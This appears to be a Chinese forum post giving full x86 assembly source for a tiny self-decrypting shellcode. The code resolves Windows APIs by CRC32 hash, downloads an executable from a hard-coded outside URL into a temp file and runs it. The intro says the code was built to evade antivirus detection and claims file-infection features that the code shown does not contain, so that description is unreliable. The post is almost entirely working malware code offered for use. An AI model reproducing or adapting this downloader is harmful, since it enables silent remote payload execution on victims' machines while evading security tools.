asm编写的只有268字节的shellcode
作者:拉伸
具备文件感染,入口代码变形,自身加密,EPO等功能,无任何
特征码的病毒,设计目的是为对抗反病毒软件的特征码杀毒、行为杀毒和虚拟机杀毒,现有代码
未提供任何破坏功能,但会主动感染可执行文件,而且被感染过的文件很难再还原,这点请注意
------很早以前的了------------
(code)
.486p
.model flat, stdcall
option casemap :none
;--------------------------------------------------------
CRC32 MACRO str
CRC_VALUE = 0ffffffffh
IRPC CRC_BYTE, str
CRC_VALUE = CRC_VALUE xor &CRC_BYTE
REPT 8
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM
ENDM
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dd (CRC_VALUE and 0ffffffffh)
ENDM
APIDEF MACRO sym
CRC32 sym
sym = [ebp + COUNT]
COUNT = COUNT + 4
ENDM
VARDEF MACRO sym, vw
sym = COUNT
COUNT = COUNT + vw
ENDM
STRDEF MACRO sym, str
local sss
sym = COUNT
sss:
db str, 0
COUNT = COUNT + ($ - sss)
ENDM
pushsz MACRO str
local pushstr
call pushstr
db str, 0
pushstr:
ENDM
;--------------------------------------------------------
.DATA
;****************************************************************************
; ???
;****************************************************************************
_ShellCodeStart:
jmp delta1
delta2:
pop ebp
xor ecx, ecx
mov cl, _ShellCodeEnd - EncryptDataStart
LoopCodeDecrypt:
xor byte ptr [ebp + ecx - 1], 0
loop LoopCodeDecrypt
jmp EncryptCodeStart
delta1:
call delta2
;--------------------------------------------------------
EncryptDataStart:
COUNT = 0
KNLAPILIST = COUNT
APIDEF ExitProcess
APIDEF GetTempFileNameA
APIDEF GetTempPathA
APIDEF LoadLibraryA
APIDEF WinExec
dd 00h ;ENDLIST
COUNT = COUNT + 4
URLAPILIST = COUNT
APIDEF URLDownloadToFileA
dd 00h ;ENDLIST
COUNT = COUNT + 4
STRDEF ExeUrl, "http://www.54rk.cn/1.exe"
; STRDEF UrlMon, "urlmon.dll"
;--------------------------------------------------------
EncryptCodeStart:
push 30h
pop esi
lods dword ptr fs:[esi] ;Peb
mov eax, [eax + 0ch] ;Ldr
mov esi, [eax + 1ch] ;InInitializationOrderModuleList
lodsd ;ntdll.dll
mov edx, [eax + 8] ;kernel32.dll
lea edi, [ebp + KNLAPILIST]
call GetApiAddressFromList ;查找需要的API地址
pushsz "urlmon.dll" ;lpLibFileName
call LoadLibraryA ;载入URLDownloadToFileA函数所在的DLL
xchg edx, eax
lea edi, [ebp + URLAPILIST]
call GetApiAddressFromList ;查找需要的API地址
xor ebx, ebx
mov edi, 260
sub esp, edi
push esp ;lpBuffer
push edi ;nBufferLength
call GetTempPathA ;获取临时文件路径
mov eax, esp
sub esp, edi
push esp ;lpTempFileName
push ebx ;wUnique
push ebx ;lpPrefixString
push eax ;lpszPath
call GetTempFileNameA ;获取临时文件名
mov eax, esp
push ebx ;lpfnCB
push ebx ;dwReserved
push eax ;szFileName
lea eax, [ebp + ExeUrl]
push eax ;szURL
push ebx ;pCaller
call URLDownloadToFileA ;下载指定文件
mov eax, esp
push ebx ;uCmdShow
push eax ;lpCmdLine
call WinExec ;执行下载的文件
push ebx ;uExitCode
call ExitProcess ;结束进程
;****************************************************************************
; ???
;****************************************************************************
GetApiAddressFromList:
pushad
mov ecx, [edx + 3ch]
add ecx, edx
mov ebx, [ecx + 78h] ;ExporyTableAddress
add ebx, edx
or ebp, -1 ;计数寄存器
SearchNextAPI:
mov ecx, [ebx + 20h] ;AddressOfNames
add ecx, edx
ContinueSearch:
inc ebp
mov eax, edx
add eax, [ecx + ebp * 4] ;取API名称字符串
pushad
or edx, -1
@1:
mov ch, [eax]
test ch, ch
jz @4
inc eax
xor dl, ch
mov cl, 8
@2:
shr edx, 1
jnc @3
xor edx, 0edb88320h
@3:
dec cl
jnz @2
jmp @1
@4:
not edx
cmp [edi], edx
popad
jne ContinueSearch
mov eax, [ebx + 24h] ;AddressOfNameOrdinals
add eax, edx
movzx eax, word ptr [eax + ebp * 2]
mov ecx, [ebx + 1ch] ;AddressOfFunctions
add ecx, edx
mov eax, [ecx + eax * 4]
add eax, edx
stosd ;保存API地址
cmp dword ptr [edi], 0 ;API名的CRC32列表以四个0字节结束
jne SearchNextAPI
popad
ret
_ShellCodeEnd:
;--------------------------------------------------------
.CODE
start:
jmp _ShellCodeStart
end start
补充:综合编程 , 安全编程 ,
